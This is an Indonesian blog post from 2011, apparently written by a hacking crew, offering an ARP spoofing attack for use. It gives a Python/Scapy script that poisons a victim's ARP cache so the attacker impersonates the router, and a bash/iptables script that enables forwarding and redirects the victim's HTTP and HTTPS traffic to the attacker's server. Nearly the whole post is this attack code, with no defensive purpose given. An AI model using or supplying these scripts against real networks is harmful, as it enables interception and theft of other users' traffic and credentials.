Selasa, 22 Februari 2011

spoofing

scipt buat spoofing = python nya

#from scapy.all import *;
#from time import sleep;
#conf.iface='wlan0';#network card XD

#target="172.16.16.47";#target /victim

#router="172.16.16.1";#routernya

#packet = ARP(); #bikin packet :P:P

#packet.psrc = router # Gateway

#packet.pdst = target # victim v.v

#try:
#while 1:
#send(packet, verbose=0);
#sleep(50);
#except:
#pass


dan yang ini adalah . . .bash nya =


#########################################################
# 4l4N #
# Malang cyber crew #
# kill-9 crew #
# indonesiancoder team #
#########################################################
#!/bin/sh
#INTERFACE="wlan0"
#SERVERWEB='172.16.16.5' #ip ente

#echo 1 > /proc/sys/net/ipv4/ip_forward
#echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
#iptables --flush
#iptables --zero
#iptables --delete-chain
#iptables -F -t nat

#iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
#iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump #MASQUERADE

#rendirect traffic.. on my server/proxy
#iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination #$SERVERWEB
#iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination #$SERVERWEB

Tidak ada komentar:

Posting Komentar